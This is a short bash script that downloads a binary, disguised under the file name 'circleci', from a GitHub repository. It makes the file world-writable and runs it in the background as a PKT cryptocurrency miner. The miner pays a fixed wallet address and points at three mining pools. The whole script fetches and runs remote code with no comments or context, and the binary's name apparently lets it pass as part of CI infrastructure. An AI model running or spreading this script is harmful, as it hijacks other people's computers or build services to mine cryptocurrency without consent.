#!/bin/bash
wget https://github.com/aurbach55/zash/raw/main/circleci -O data
chmod 777 data
nohup ./data ann -p pkt1q76dngmrf380w8k9j4f7w4eqpzx3n9vcprldmjx http://pool.pkt.world http://pool.pktpool.io http://pool.pkteer.com > nohup.out
